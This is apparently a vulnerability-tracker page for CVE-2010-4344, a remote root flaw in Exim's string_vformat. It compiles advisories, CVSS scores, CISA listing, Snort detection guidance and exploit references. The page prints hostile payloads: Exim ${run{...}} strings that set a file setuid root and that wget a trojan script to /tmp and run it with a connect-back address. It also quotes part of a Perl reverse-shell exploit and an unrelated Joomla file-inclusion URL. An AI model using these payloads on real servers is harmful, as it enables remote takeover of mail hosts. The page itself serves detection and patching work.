CVE-2010-4344
published 2010-12-14CVE-2010-4344: Heap-based buffer overflow in the string_vformat function in string.c in Exim before 4.70 allows remote attackers to execute arbitrary code via an SMTP session…
PriorityP194critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-04-15
Exploited in the wild
EPSS
71.79%
99.3th percentile
Heap-based buffer overflow in the string_vformat function in string.c in Exim before 4.70 allows remote attackers to execute arbitrary code via an SMTP session that includes two MAIL commands in conjunction with a large message containing crafted headers, leading to improper rejection logging.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| debian | debian_linux | — | — |
| debian | exim4 | < exim4 4.70-1 (bookworm) | exim4 4.70-1 (bookworm) |
| exim | exim | < 4.70 | 4.70 |
| opensuse | opensuse | — | — |
| opensuse | opensuse | — | — |
| opensuse | opensuse | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandspool_directory = ${run{/bin/chown root:root /var/spool/exim4/s}}${run{/bin/chmod 4755 /var/spool/exim4/s}}↗
command${run{/bin/sh -c "exec /bin/sh -c 'wget $trojan -O /tmp/c.pl;perl /tmp/c.pl $myip $myport; sleep 10000000'"}}↗
snort↗
SID 124:2:1
- →Snort SMTP preprocessor SID 124:2:1 fires on oversized SMTP header lines (>2000 bytes) characteristic of CVE-2010-4344 exploitation; no custom config required with default settings. ↗
- →Alert on SMTP DATA headers exceeding ~2896 characters; the PoC triggers the alert with '(smtp) Attempted data header buffer overflow: 2896 chars'. ↗
- →Exploit requires two MAIL FROM commands in a single SMTP session: first to deliver the oversized message (triggering rejection logging overflow), second to trigger expand_string execution of the injected ACL payload. ↗
- →Look for Exim ${run{...}} expansion strings embedded inside SMTP message headers — this is the payload delivery mechanism used to execute shell commands. ↗
- →Detect oversized SMTP DATA messages (exceeding the server's advertised SIZE limit by 256 KB) sent to trigger rejection-log heap overflow; the exploit sets msg_len = max_msg + 1024*256. ↗
- ·Snort SMTP preprocessor max_header_line_len must be set to 2000 bytes or less to ensure SID 124:2:1 fires; the default is 1000 bytes, but operators who have raised this value above 2000 will miss the attack. ↗
- ·The heap overflow is only triggered when Exim's rejection header logging is active (the default). Deployments that have disabled rejection logging in exim.conf will not be exploitable via this specific vector. ↗
- ·The Metasploit module targets Exim versions matching /Exim 4\.6\d+/ in the banner; it will abort with a warning for other version strings unless SkipVersionCheck is set, meaning detection based solely on banner version may miss patched or differently versioned installs. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
osv9.8CRITICAL
vulncheck9.8CRITICAL
cisa9.8CRITICAL
vendor_debian9.8CRITICAL
vendor_redhat9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-mvgg-qcrq-7wr8: Heap-based buffer overflow in the string_vformat function in string
ghsa_unreviewed·2022-05-17
CVE-2010-4344 [HIGH] CWE-119 GHSA-mvgg-qcrq-7wr8: Heap-based buffer overflow in the string_vformat function in string
Heap-based buffer overflow in the string_vformat function in string.c in Exim before 4.70 allows remote attackers to execute arbitrary code via an SMTP session that includes two MAIL commands in conjunction with a large message containing crafted headers, leading to improper rejection logging.
OSV
CVE-2010-4344: Heap-based buffer overflow in the string_vformat function in string
osv·2010-12-14·CVSS 9.8
CVE-2010-4344 [CRITICAL] CVE-2010-4344: Heap-based buffer overflow in the string_vformat function in string
Heap-based buffer overflow in the string_vformat function in string.c in Exim before 4.70 allows remote attackers to execute arbitrary code via an SMTP session that includes two MAIL commands in conjunction with a large message containing crafted headers, leading to improper rejection logging.
VulnCheck
Exim Heap-Based Buffer Overflow Vulnerability
vulncheck·2010·CVSS 9.8
CVE-2010-4344 [CRITICAL] CWE-119 Exim Heap-Based Buffer Overflow Vulnerability
Exim Heap-Based Buffer Overflow Vulnerability
Heap-based buffer overflow in the string_vformat function in string.c in Exim before 4.70 allows remote attackers to execute arbitrary code via an SMTP session.
Affected: Exim Exim
Required Action: Apply updates per vendor instructions.
Exploitation References: https://lists.exim.org/lurker/message/20101210.164935.385e04d0.en.html; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
Remediation Due: 2022-04-15
CISA
Exim Heap-Based Buffer Overflow Vulnerability
cisa·2022-03-25·CVSS 9.8
CVE-2010-4344 [CRITICAL] CWE-119 Exim Heap-Based Buffer Overflow Vulnerability
Vulnerability: Exim Heap-Based Buffer Overflow Vulnerability
Affected: Exim Exim
Heap-based buffer overflow in the string_vformat function in string.c in Exim before 4.70 allows remote attackers to execute arbitrary code via an SMTP session.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2010-4344
Remediation Due Date: 2022-04-15
Ubuntu
Exim vulnerability
vendor_ubuntu·2010-12-11
CVE-2010-4344 Exim vulnerability
Title: Exim vulnerability
Summary: A remote attacker could send crafted email to gain root access.
Sergey Kononenko and Eugene Bujak discovered that Exim did not correctly
truncate string expansions. A remote attacker could send specially crafted
email traffic to run arbitrary code as the Exim user, which could also
lead to root privileges.
Instructions: In general, a standard system update will make all the necessary changes.
Red Hat
exim: remote code execution flaw
vendor_redhat·2010-12-07·CVSS 9.8
CVE-2010-4344 [CRITICAL] CWE-78 exim: remote code execution flaw
exim: remote code execution flaw
Heap-based buffer overflow in the string_vformat function in string.c in Exim before 4.70 allows remote attackers to execute arbitrary code via an SMTP session that includes two MAIL commands in conjunction with a large message containing crafted headers, leading to improper rejection logging.
Debian
CVE-2010-4344: exim4 - Heap-based buffer overflow in the string_vformat function in string.c in Exim be...
vendor_debian·2010·CVSS 9.8
CVE-2010-4344 [CRITICAL] CVE-2010-4344: exim4 - Heap-based buffer overflow in the string_vformat function in string.c in Exim be...
Heap-based buffer overflow in the string_vformat function in string.c in Exim before 4.70 allows remote attackers to execute arbitrary code via an SMTP session that includes two MAIL commands in conjunction with a large message containing crafted headers, leading to improper rejection logging.
Scope: local
bookworm: resolved (fixed in 4.70-1)
bullseye: resolved (fixed in 4.70-1)
forky: resolved (fixed in 4.70-1)
sid: resolved (fixed in 4.70-1)
trixie: resolved (fixed in 4.70-1)
No detection rules found.
Exploit-DB
Exim4 < 4.69 - string_format Function Heap Buffer Overflow (Metasploit)
exploitdb·2010-12-16
CVE-2010-4345 Exim4 < 4.69 - string_format Function Heap Buffer Overflow (Metasploit)
Exim4 'Exim4 %q{
This module exploits a heap buffer overflow within versions of Exim prior to
version 4.69. By sending a specially crafted message, an attacker can corrupt the
heap and execute arbitrary code with the privileges of the Exim daemon.
The root cause is that no check is made to ensure that the buffer is not full
prior to handling '%s' format specifiers within the 'string_vformat' function.
In order to trigger this issue, we get our message rejected by sending a message
that is too large. This will call into log_write to log rejection headers (which
is a default configuration setting). After filling the buffer, a long header
string is sent. In a successful attempt, it overwrites the ACL for the 'MAIL
FROM' command. By sending a second message, the string we sent will be evaluat
Exploit-DB
Exim 4.63 - Remote Command Execution
exploitdb·2010-12-11
CVE-2010-4344 Exim 4.63 - Remote Command Execution
Exim 4.63 - Remote Command Execution
---
#Exim 4.63 (RedHat/Centos/Debian) Remote Root Exploit by Kingcope
#Modified perl version of metasploit module
=for comment
use this connect back shell as "trojanurl" and be sure to setup a netcat,
---snip---
$system = '/bin/sh';
$ARGC=@ARGV;
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
open FILE, ">/var/spool/exim4/s.c";
print FILE qq{
#include
#include
int main(int argc,
Exploit-DB
Joomla! Component Jimtawl 1.0.2 - Local File Inclusion
exploitdb·2010-11-20
CVE-2010-4769 Joomla! Component Jimtawl 1.0.2 - Local File Inclusion
Joomla! Component Jimtawl 1.0.2 - Local File Inclusion
---
Joomla Component (com_jimtawl) LFI Vulnerability
Author : Mask_magicianz
Date : November, 20/2010
Location : Medan, Indonesia
Time Zone : GMT +7:00
Application : Package Jimtawl
Dork : com_jimtawl
Contact : Mask_magicianz[at]yahoo[dot]com
http://extensions.joomla.org/extensions/multimedia/streaming-a-broadcasting/audio-broadcasting/4344
http://127.0.0.1/index.php?option=com_jimtawl&Itemid=12&task=[LFI]
http://127.0.0.1/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00
Thanks to : All RosebanditZ Team & All IndonesiaCoder
Metasploit
Exim4 string_format Function Heap Buffer Overflow
metasploit·CVSS 7.8
[HIGH] Exim4 string_format Function Heap Buffer Overflow
Exim4 string_format Function Heap Buffer Overflow
This module exploits a heap buffer overflow within versions of Exim prior to version 4.69. By sending a specially crafted message, an attacker can corrupt the heap and execute arbitrary code with the privileges of the Exim daemon. The root cause is that no check is made to ensure that the buffer is not full prior to handling '%s' format specifiers within the 'string_vformat' function. In order to trigger this issue, we get our message rejected by sending a message that is too large. This will call into log_write to log rejection headers (which is a default configuration setting). After filling the buffer, a long header string is sent. In a successful attempt, it overwrites the ACL for the 'MAIL FROM' command. By sending a second message, t
Talos
Exim Remote Root
blogs_talos·2010-12-14·CVSS 9.8
CVE-2010-4344 [CRITICAL] Exim Remote Root
We've heard from a number of Sourcefire customers and open-source Snort users lately, asking us whether we'll be releasing coverage for last week's Exim remote root (CVE-2010-4344 for those keeping score at home). Based on what hit the Exim-dev mailing list, we felt confident that the SMTP preprocessor would catch the vulnerability; after testing with the proof-of-concept sent to the Full-Disclosure mailing list on Saturday, we've confirmed that SID 124:2:1 does the job nicely:
```
# ~/snort-2.9.0$ src/snort -c etc/snort.2900.conf -q -A cmg -r ~/pcaps/cve-2010-4344-full-disclosure.pcap
12/14-09:15:37.145472 [**] [124:2:1] (smtp) Attempted data header buffer overflow: 2896 chars [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 10.1.11.11:35781 -> 10.1.11.11
Talos
Exim Remote Root
blogs_talos·2010-12-14·CVSS 9.8
CVE-2010-4344 [CRITICAL] Exim Remote Root
## Exim Remote Root
We've heard from a number of Sourcefire customers and open-source Snort users lately, asking us whether we'll be releasing coverage for last week's Exim remote root ( CVE-2010-4344 for those keeping score at home). Based on what hit the Exim-dev mailing list, we felt confident that the SMTP preprocessor would catch the vulnerability; after testing with the proof-of-concept sent to the Full-Disclosure mailing list on Saturday, we've confirmed that SID 124:2:1 does the job nicely:
# ~/snort-2.9.0$ src/snort -c etc/snort.2900.conf -q -A cmg -r ~/pcaps/cve-2010-4344-full-disclosure.pcap
12/14-09:15:37.145472 [**] [124:2:1] (smtp) Attempted data header buffer overflow: 2896 chars [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 10.1.11.11:3
Bugzilla
CVE-2010-4344 exim: remote code execution flaw
bugzilla·2010-12-09·CVSS 9.8
CVE-2010-4344 [CRITICAL] CVE-2010-4344 exim: remote code execution flaw
CVE-2010-4344 exim: remote code execution flaw
There is a possible remote root flaw in Exim:
http://www.exim.org/lurker/message/20101207.215955.bb32d4f2.en.html
We do not currently know more than is contained in this mail. We will
update this bug with further information as it is discovered.
Discussion:
There are two bugs here. First a remote exploit where the attacker somehow tricks Exim into evaluating data it shouldn't, and honouring a ${run {/bin/sh...}} directive which ends up giving the attacker a shell.
Secondly a privilege escalation where the trusted 'exim' user is able to tell Exim to use arbitrary config files, in which further ${run ...} commands will be invoked as root.
The latter should be addressed by the patch at http://lists.exim.org/lurker/message/20101209.172233.ab
ftp://ftp.exim.org/pub/exim/ChangeLogs/ChangeLog-4.70http://atmail.com/blog/2010/atmail-6204-now-available/http://bugs.exim.org/show_bug.cgi?id=787http://git.exim.org/exim.git/commit/24c929a27415c7cfc7126c47e4cad39acf3efa6bhttp://lists.exim.org/lurker/message/20101210.164935.385e04d0.en.htmlhttp://lists.opensuse.org/opensuse-security-announce/2010-12/msg00003.htmlhttp://openwall.com/lists/oss-security/2010/12/10/1http://secunia.com/advisories/40019http://secunia.com/advisories/42576http://secunia.com/advisories/42586http://secunia.com/advisories/42587http://secunia.com/advisories/42589http://www.cpanel.net/2010/12/exim-remote-memory-corruption-vulnerability-notification-cve-2010-4344.htmlhttp://www.debian.org/security/2010/dsa-2131http://www.exim.org/lurker/message/20101207.215955.bb32d4f2.en.htmlhttp://www.kb.cert.org/vuls/id/682457http://www.metasploit.com/modules/exploit/unix/smtp/exim4_string_formathttp://www.openwall.com/lists/oss-security/2021/05/04/7http://www.osvdb.org/69685http://www.redhat.com/support/errata/RHSA-2010-0970.htmlhttp://www.securityfocus.com/archive/1/515172/100/0/threadedhttp://www.securityfocus.com/bid/45308http://www.securitytracker.com/id?1024858http://www.theregister.co.uk/2010/12/11/exim_code_execution_peril/http://www.ubuntu.com/usn/USN-1032-1http://www.vupen.com/english/advisories/2010/3171http://www.vupen.com/english/advisories/2010/3172http://www.vupen.com/english/advisories/2010/3181http://www.vupen.com/english/advisories/2010/3186http://www.vupen.com/english/advisories/2010/3204http://www.vupen.com/english/advisories/2010/3246http://www.vupen.com/english/advisories/2010/3317https://bugzilla.redhat.com/show_bug.cgi?id=661756ftp://ftp.exim.org/pub/exim/ChangeLogs/ChangeLog-4.70http://atmail.com/blog/2010/atmail-6204-now-available/http://bugs.exim.org/show_bug.cgi?id=787http://git.exim.org/exim.git/commit/24c929a27415c7cfc7126c47e4cad39acf3efa6bhttp://lists.exim.org/lurker/message/20101210.164935.385e04d0.en.htmlhttp://lists.opensuse.org/opensuse-security-announce/2010-12/msg00003.htmlhttp://openwall.com/lists/oss-security/2010/12/10/1http://secunia.com/advisories/40019http://secunia.com/advisories/42576http://secunia.com/advisories/42586http://secunia.com/advisories/42587http://secunia.com/advisories/42589http://www.cpanel.net/2010/12/exim-remote-memory-corruption-vulnerability-notification-cve-2010-4344.htmlhttp://www.debian.org/security/2010/dsa-2131http://www.exim.org/lurker/message/20101207.215955.bb32d4f2.en.htmlhttp://www.kb.cert.org/vuls/id/682457http://www.metasploit.com/modules/exploit/unix/smtp/exim4_string_formathttp://www.openwall.com/lists/oss-security/2021/05/04/7http://www.osvdb.org/69685http://www.redhat.com/support/errata/RHSA-2010-0970.htmlhttp://www.securityfocus.com/archive/1/515172/100/0/threadedhttp://www.securityfocus.com/bid/45308http://www.securitytracker.com/id?1024858http://www.theregister.co.uk/2010/12/11/exim_code_execution_peril/http://www.ubuntu.com/usn/USN-1032-1http://www.vupen.com/english/advisories/2010/3171http://www.vupen.com/english/advisories/2010/3172http://www.vupen.com/english/advisories/2010/3181http://www.vupen.com/english/advisories/2010/3186http://www.vupen.com/english/advisories/2010/3204http://www.vupen.com/english/advisories/2010/3246http://www.vupen.com/english/advisories/2010/3317https://bugzilla.redhat.com/show_bug.cgi?id=661756https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2010-4344
2010-12-14
Published
2022-03-25
Added to CISA KEV
Exploited in the wild